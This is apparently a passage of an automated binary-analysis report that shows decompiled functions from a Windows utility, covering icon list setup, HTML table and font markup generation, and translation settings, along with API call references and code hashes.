                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                      • API String ID: 1223191525-1542517562
                                                                                                                                                      • Opcode ID: e3c1c2c435bed2f941286cbfa00b0d5ce1b97d62a5a92108709d5ab5f08d6fec
                                                                                                                                                      • Instruction ID: 259d72124e724de92b6e9870ccb5e43e5a0f9d392629a35824c20b6fa1ecb0e7
                                                                                                                                                      • Opcode Fuzzy Hash: e3c1c2c435bed2f941286cbfa00b0d5ce1b97d62a5a92108709d5ab5f08d6fec
                                                                                                                                                      • Instruction Fuzzy Hash: FB4135B2900219BEC704EBE5DC41DDEB7BCAF48304F504567B505B3181DB78AA99CBE8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004099C4, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                                      			E004099C4(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2c0)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2c8)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2b4) = _t48;
						__imp__ImageList_SetImageCount(_t48, 1);
						_push( *(_t62 + 0x2b4));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2b4) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2c4)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2b8) = _t46;
					__imp__ImageList_SetImageCount(_t46, 1);
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 0,  *(_t62 + 0x2b8));
				}
				 *(_t62 + 0x2b0) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2b0), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E00402986( *(_t62 + 0x2ac)), 0x1208, 0,  *(_t62 + 0x2b0));
			}


















                                                                                                                                                      0x004099cc
                                                                                                                                                      0x004099d3
                                                                                                                                                      0x004099e4
                                                                                                                                                      0x004099f0
                                                                                                                                                      0x00409a65
                                                                                                                                                      0x00409a6a
                                                                                                                                                      0x00409a70
                                                                                                                                                      0x00409a76
                                                                                                                                                      0x004099f2
                                                                                                                                                      0x00409a00
                                                                                                                                                      0x00409a07
                                                                                                                                                      0x00409a17
                                                                                                                                                      0x00409a1c
                                                                                                                                                      0x00409a2e
                                                                                                                                                      0x00409a4c
                                                                                                                                                      0x00409a52
                                                                                                                                                      0x00409a58
                                                                                                                                                      0x00409a58
                                                                                                                                                      0x00409a89
                                                                                                                                                      0x00409a89
                                                                                                                                                      0x00409a91
                                                                                                                                                      0x00409a9d
                                                                                                                                                      0x00409aa2
                                                                                                                                                      0x00409aa8
                                                                                                                                                      0x00409ac0
                                                                                                                                                      0x00409ac0
                                                                                                                                                      0x00409ad5
                                                                                                                                                      0x00409af4
                                                                                                                                                      0x00409b0a
                                                                                                                                                      0x00409b17
                                                                                                                                                      0x00409b1b
                                                                                                                                                      0x00409b23
                                                                                                                                                      0x00409b34
                                                                                                                                                      0x00409b3e
                                                                                                                                                      0x00409b4e
                                                                                                                                                      0x00409b5a
                                                                                                                                                      0x00409b60
                                                                                                                                                      0x00409b89

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00409A07
                                                                                                                                                      • memset.MSVCRT ref: 00409A1C
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A2E
                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00409A4C
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409A65
                                                                                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409A70
                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 00409A89
                                                                                                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409A9D
                                                                                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409AA8
                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00409AC0
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409ACC
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00409ADB
                                                                                                                                                      • LoadImageW.USER32 ref: 00409AED
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00409AF8
                                                                                                                                                      • LoadImageW.USER32 ref: 00409B0A
                                                                                                                                                      • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409B1B
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00409B23
                                                                                                                                                      • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00409B3E
                                                                                                                                                      • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00409B4E
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00409B5A
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00409B60
                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00409B7D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 304928396-0
                                                                                                                                                      • Opcode ID: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                      • Instruction ID: 6a740ff22d918b1f3da30253e66a4340b4722f468affa3cdbe00c11f6054e755
                                                                                                                                                      • Opcode Fuzzy Hash: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                      • Instruction Fuzzy Hash: 4C419271641304BFE730AFA0DD8AF9B77A8FB48700F000839F795A51D2C7B6A8449B29
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040DC79, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 69%
                                                                                                                                                      			E0040DC79(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040DBA9(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                                                      0x0040dc79
                                                                                                                                                      0x0040dc94
                                                                                                                                                      0x0040dc9b
                                                                                                                                                      0x0040dca9
                                                                                                                                                      0x0040dcb0
                                                                                                                                                      0x0040dcb5
                                                                                                                                                      0x0040dcbc
                                                                                                                                                      0x0040dcc3
                                                                                                                                                      0x0040dcca
                                                                                                                                                      0x0040dcca
                                                                                                                                                      0x0040dcd0
                                                                                                                                                      0x0040dcd3
                                                                                                                                                      0x0040dcd6
                                                                                                                                                      0x0040dce2
                                                                                                                                                      0x0040dce7
                                                                                                                                                      0x0040dcee
                                                                                                                                                      0x0040dcf0
                                                                                                                                                      0x0040dcf1
                                                                                                                                                      0x0040dcfc
                                                                                                                                                      0x0040dd01
                                                                                                                                                      0x0040dd02
                                                                                                                                                      0x0040dd0f
                                                                                                                                                      0x0040dd14
                                                                                                                                                      0x0040dd14
                                                                                                                                                      0x0040dd17
                                                                                                                                                      0x0040dd1d
                                                                                                                                                      0x0040dd2c
                                                                                                                                                      0x0040dd2d
                                                                                                                                                      0x0040dd38
                                                                                                                                                      0x0040dd3d
                                                                                                                                                      0x0040dd3e
                                                                                                                                                      0x0040dd4b
                                                                                                                                                      0x0040dd50
                                                                                                                                                      0x0040dd59
                                                                                                                                                      0x0040dd5f
                                                                                                                                                      0x0040dd63
                                                                                                                                                      0x0040dd6b
                                                                                                                                                      0x0040dd71
                                                                                                                                                      0x0040dd76
                                                                                                                                                      0x0040dd80
                                                                                                                                                      0x0040dd88
                                                                                                                                                      0x0040dd8e
                                                                                                                                                      0x0040dd92
                                                                                                                                                      0x0040dd9a
                                                                                                                                                      0x0040dda0
                                                                                                                                                      0x0040dda6

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                                                                      • Opcode ID: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
                                                                                                                                                      • Instruction ID: c1522ee0e6335da557e9dda04135524704fc8f14ed906b709f088109683ecb65
                                                                                                                                                      • Opcode Fuzzy Hash: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
                                                                                                                                                      • Instruction Fuzzy Hash: 213184B2D04306AEE720AA959C82A6B73B99F44714F10817FF215B21C2DB7859889A18
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00408C24, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 56%
                                                                                                                                                      			E00408C24(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t151;
				intOrPtr* _t152;
				signed int _t154;
				signed int _t155;
				void* _t157;
				void* _t159;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t151 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t159 = _t157 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_t128 =  *((intOrPtr*)(__ebx + 0x2e4));
				_v16 =  *((intOrPtr*)(__ebx + 0x2e4));
				if(_t87 != 0xffffffff) {
					_t128 =  &_v964;
					_push(E0040DBA9(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040DFD6();
					_t159 = _t159 + 0x18;
				}
				E00408857(_t124, _t128, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t151;
				if( *((intOrPtr*)(_t124 + 0x34)) > _t151) {
					while(1) {
						_t154 =  *( *((intOrPtr*)(_t124 + 0x38)) + _v8 * 4);
						_v12 = _t154;
						_t155 = _t154 * 0x14;
						if( *((intOrPtr*)(_t155 +  *((intOrPtr*)(_t124 + 0x48)) + 8)) != _t151) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t151;
						_t152 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t152,  &_v32);
						E0040DBA9(_v32,  &_v348);
						E0040DBDA( *((intOrPtr*)( *_t152))(_v12,  *((intOrPtr*)(_t124 + 0x68))),  *(_t124 + 0x6c));
						 *((intOrPtr*)( *_t124 + 0x54))( *(_t124 + 0x6c), _t152, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x70),  *(_t155 + _v16 + 0x10));
						} else {
							_push( *(_t155 + _v16 + 0x10));
							_push(E0040DBA9(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x70));
							L0040DFD6();
							_t159 = _t159 + 0x14;
						}
						_t109 =  *(_t124 + 0x6c);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
							_pop(_t128);
						}
						E0040DC79( &_v32,  *((intOrPtr*)(_t124 + 0x74)),  *(_t124 + 0x6c));
						_push( *((intOrPtr*)(_t124 + 0x74)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x70));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x68)));
						L0040DFD6();
						_t159 = _t159 + 0x28;
						E00408857(_t124, _t128, _a4,  *((intOrPtr*)(_t124 + 0x68)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x34))) {
							goto L14;
						}
						_t151 = 0;
					}
				}
				L14:
				E00408857(_t124, _t128, _a4, L"</table><p>");
				return E00408857(_t124, _t128, _a4, L"\r\n");
			}































                                                                                                                                                      0x00408c24
                                                                                                                                                      0x00408c2d
                                                                                                                                                      0x00408c45
                                                                                                                                                      0x00408c4c
                                                                                                                                                      0x00408c58
                                                                                                                                                      0x00408c5a
                                                                                                                                                      0x00408c5c
                                                                                                                                                      0x00408c68
                                                                                                                                                      0x00408c6f
                                                                                                                                                      0x00408c7e
                                                                                                                                                      0x00408c85
                                                                                                                                                      0x00408c94
                                                                                                                                                      0x00408c9b
                                                                                                                                                      0x00408ca2
                                                                                                                                                      0x00408ca7
                                                                                                                                                      0x00408cad
                                                                                                                                                      0x00408cb3
                                                                                                                                                      0x00408cb6
                                                                                                                                                      0x00408cb8
                                                                                                                                                      0x00408cc5
                                                                                                                                                      0x00408cc6
                                                                                                                                                      0x00408cd1
                                                                                                                                                      0x00408cd3
                                                                                                                                                      0x00408cd4
                                                                                                                                                      0x00408cd9
                                                                                                                                                      0x00408cd9
                                                                                                                                                      0x00408ce6
                                                                                                                                                      0x00408cee
                                                                                                                                                      0x00408cf1
                                                                                                                                                      0x00408cfb
                                                                                                                                                      0x00408d01
                                                                                                                                                      0x00408d07
                                                                                                                                                      0x00408d0a
                                                                                                                                                      0x00408d11
                                                                                                                                                      0x00408d1f
                                                                                                                                                      0x00408d25
                                                                                                                                                      0x00408d28
                                                                                                                                                      0x00408d2c
                                                                                                                                                      0x00408d30
                                                                                                                                                      0x00408d38
                                                                                                                                                      0x00408d3b
                                                                                                                                                      0x00408d46
                                                                                                                                                      0x00408d53
                                                                                                                                                      0x00408d69
                                                                                                                                                      0x00408d79
                                                                                                                                                      0x00408d86
                                                                                                                                                      0x00408dc0
                                                                                                                                                      0x00408d88
                                                                                                                                                      0x00408d8b
                                                                                                                                                      0x00408d9e
                                                                                                                                                      0x00408d9f
                                                                                                                                                      0x00408da4
                                                                                                                                                      0x00408da9
                                                                                                                                                      0x00408dac
                                                                                                                                                      0x00408db1
                                                                                                                                                      0x00408db1
                                                                                                                                                      0x00408dc7
                                                                                                                                                      0x00408dca
                                                                                                                                                      0x00408dd0
                                                                                                                                                      0x00408dde
                                                                                                                                                      0x00408de4
                                                                                                                                                      0x00408de4
                                                                                                                                                      0x00408dee
                                                                                                                                                      0x00408df3
                                                                                                                                                      0x00408dfc
                                                                                                                                                      0x00408e03
                                                                                                                                                      0x00408e04
                                                                                                                                                      0x00408e0d
                                                                                                                                                      0x00408e14
                                                                                                                                                      0x00408e15
                                                                                                                                                      0x00408e1a
                                                                                                                                                      0x00408e1d
                                                                                                                                                      0x00408e22
                                                                                                                                                      0x00408e2d
                                                                                                                                                      0x00408e32
                                                                                                                                                      0x00408e3b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408cf9
                                                                                                                                                      0x00408cf9
                                                                                                                                                      0x00408cfb
                                                                                                                                                      0x00408e41
                                                                                                                                                      0x00408e4b
                                                                                                                                                      0x00408e62

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                      • Opcode ID: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                      • Instruction ID: a67fbf1fc49fec725baa5abd822cc1541e9ed8d2f41859f279ded4865cedaa1f
                                                                                                                                                      • Opcode Fuzzy Hash: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                      • Instruction Fuzzy Hash: E261AC31900208AFDF24AF55CC85EAA7B79FF44310F1045BAF805BA2D2DB75AA45DB58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00409190, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 42%
                                                                                                                                                      			E00409190(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t75 = __ecx;
				E0040E340(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040DBA9(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040DFD6();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040DBA9(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040DFD6();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040DFD6();
				_t80 = _t79 + 0x10;
				E00408857(_a4, _t75, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040DFD6();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040DFD6();
						_t80 = _t81 + 0x1c;
						_t61 = E00408857(_a4, _t75, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                                                      0x00409190
                                                                                                                                                      0x00409198
                                                                                                                                                      0x004091af
                                                                                                                                                      0x004091b6
                                                                                                                                                      0x004091c4
                                                                                                                                                      0x004091cb
                                                                                                                                                      0x004091d9
                                                                                                                                                      0x004091e0
                                                                                                                                                      0x004091e5
                                                                                                                                                      0x004091ec
                                                                                                                                                      0x004091fd
                                                                                                                                                      0x004091fe
                                                                                                                                                      0x00409209
                                                                                                                                                      0x0040920e
                                                                                                                                                      0x0040920f
                                                                                                                                                      0x00409214
                                                                                                                                                      0x00409214
                                                                                                                                                      0x0040921b
                                                                                                                                                      0x0040922c
                                                                                                                                                      0x0040922d
                                                                                                                                                      0x00409238
                                                                                                                                                      0x0040923d
                                                                                                                                                      0x0040923e
                                                                                                                                                      0x0040924f
                                                                                                                                                      0x00409254
                                                                                                                                                      0x00409254
                                                                                                                                                      0x0040925d
                                                                                                                                                      0x0040925e
                                                                                                                                                      0x00409269
                                                                                                                                                      0x0040926e
                                                                                                                                                      0x0040926f
                                                                                                                                                      0x00409274
                                                                                                                                                      0x00409284
                                                                                                                                                      0x00409289
                                                                                                                                                      0x0040928e
                                                                                                                                                      0x00409298
                                                                                                                                                      0x0040929b
                                                                                                                                                      0x0040929e
                                                                                                                                                      0x004092a7
                                                                                                                                                      0x004092ae
                                                                                                                                                      0x004092b3
                                                                                                                                                      0x004092b5
                                                                                                                                                      0x004092bb
                                                                                                                                                      0x004092d9
                                                                                                                                                      0x004092bd
                                                                                                                                                      0x004092bd
                                                                                                                                                      0x004092be
                                                                                                                                                      0x004092c9
                                                                                                                                                      0x004092ce
                                                                                                                                                      0x004092cf
                                                                                                                                                      0x004092d4
                                                                                                                                                      0x004092d4
                                                                                                                                                      0x004092e6
                                                                                                                                                      0x004092e7
                                                                                                                                                      0x004092f0
                                                                                                                                                      0x004092f7
                                                                                                                                                      0x004092f8
                                                                                                                                                      0x00409303
                                                                                                                                                      0x00409308
                                                                                                                                                      0x00409309
                                                                                                                                                      0x0040930e
                                                                                                                                                      0x0040931e
                                                                                                                                                      0x00409323
                                                                                                                                                      0x00409326
                                                                                                                                                      0x00409326
                                                                                                                                                      0x00409326
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040932f
                                                                                                                                                      0x00409333

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                      • Opcode ID: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                      • Instruction ID: a3c2da3f9a4e1dbf7e2b2d72e589ec7db7b3c133e798fc967c269c0974e8c497
                                                                                                                                                      • Opcode Fuzzy Hash: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                      • Instruction Fuzzy Hash: DD41527194021A6AEB20EE55CC41FEA737CFF45304F4444BAF909F2192E7789A548FA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00407297, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 95COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E00407297(void* __ecx, void* __eflags, char _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040E340(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00405800( &_v532);
				_pop(_t44);
				E0040674D( &_v5164);
				_t27 = E0040DE36( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x412c38, _a8);
				wcscpy(0x412e48, L"general");
				E00406DE5(_t61, L"TranslatorName", 0x40f454, 0);
				E00406DE5(_t61, L"TranslatorURL", 0x40f454, 0);
				E00406DE5(_t61, L"Version",  &_v1044, 1);
				E00406DE5(_t61, L"RTL", "0", 0);
				_t13 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t13, 4, E00407047, 0);
				_t14 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t14, 5, E00407047, 0);
				wcscpy(0x412e48, L"strings");
				_t38 = E00407170(_t44, _t61, _a4);
				 *0x412c38 =  *0x412c38 & 0x00000000;
				return _t38;
			}













                                                                                                                                                      0x0040729f
                                                                                                                                                      0x004072b6
                                                                                                                                                      0x004072bd
                                                                                                                                                      0x004072d2
                                                                                                                                                      0x004072d9
                                                                                                                                                      0x004072e8
                                                                                                                                                      0x004072ed
                                                                                                                                                      0x004072f4
                                                                                                                                                      0x00407306
                                                                                                                                                      0x0040730b
                                                                                                                                                      0x0040730d
                                                                                                                                                      0x0040731d
                                                                                                                                                      0x00407323
                                                                                                                                                      0x00407323
